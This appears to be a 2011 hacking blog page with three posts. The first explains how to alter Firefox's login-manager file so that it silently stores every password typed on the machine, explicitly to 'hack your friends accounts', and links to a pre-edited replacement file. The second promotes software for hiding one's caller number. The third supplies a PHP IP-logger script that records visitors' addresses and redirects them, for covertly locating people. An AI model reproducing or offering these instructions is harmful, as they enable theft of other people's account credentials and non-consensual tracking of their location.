Friday, March 4, 2011

Turn Your Firefox into a Stealer Without any Software


Ever wanted to hack your friends accounts, whenever they were over your house. Or you just wanted Firefox to save all your passwords without prompting you every single time! This tutorial is for you, read on!
Steps:
1) Close Firefox
2) Navigate to:
Windows – C:/Program Files/Mozilla Firefox/Components
Mac – Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components
3) We are going to edit a file called nsLoginManagerPrompter.js, it is recommended you create a copy of it so you can replace the original file when you want to turn off this feature.
I recommend you download the following file and simply overwrite the existing nsLoginManagerPrompter.js with it, it is one I have already edited and works.
Download here.
From now on, when someone logs onto any site, they username and password will be saved automatically, without prompt!
To retrieve the account information, make sure Firefox is opened, go to Tools > Options… > Security Tab > click on saved passwords, then click on show passwords, and press yes!
Hope that helped anyone. Enjoy!
Do you have questions, comments, or suggestions? Feel free to post a comment!

Free Calling in the Overall World..by Mobivox

By Mobivox Software u can Free Calling in the Overall World. U can also use this Software to Hide Your Number n Calling Anyone,
Download Mobivox :  Here
and also hide your number use by your mind…..
don`t misuse it..

How to Hack Someones IP Address

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger or Gtalk. Finding out someone’s IP address is like finding their phone number, an IP address can be used to find the general location where that person lives. Now while most of the tutorials on the net teach you how to steal an ip address via MSN, or any other chat software, in this post I’ll show you how to find IP address of someones computer using script. Using this method for hacking someones ip adress is very easy and effectively, so just follow the steps bellow.
NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk.
How to Hack Someones IP Address?
Alright, I’m gonna give you this script, that you write in the index.php. It will redirect them to http://www.google.com/, but you can change that in the script.
Here is the sript:
Code:
<?php
$file = ‘IPz.txt’;
$handle = fopen($file,’a');
if(!isset($_GET['p'])) { header(‘Location: http://google.com’); }
fwrite($handle, $_GET['p'].’: ‘.$_SERVER['REMOTE_ADDR'].’\r\n’);
fclose($handle)
?>
1. First of all you need to make a new .txt document on the website you’re uploading this to. Call it IPz.txt (You can change that in the script aswell where it says $file = ‘IPz.txt’; in the second line. Then change the CHMOD to 777.
2. Now you need to past the script above in to a .php document, and upload it.
3. Now you make people visit your site, and they will get redirected to Google.
4. To view the IP, you simply add “/IPz.txt” after your domain, and you’ll see the IP.
This is a very simple, but effectually method for stealing someones IP Address.
Hope you’ll find this tutorial useful. Happy Hacking :)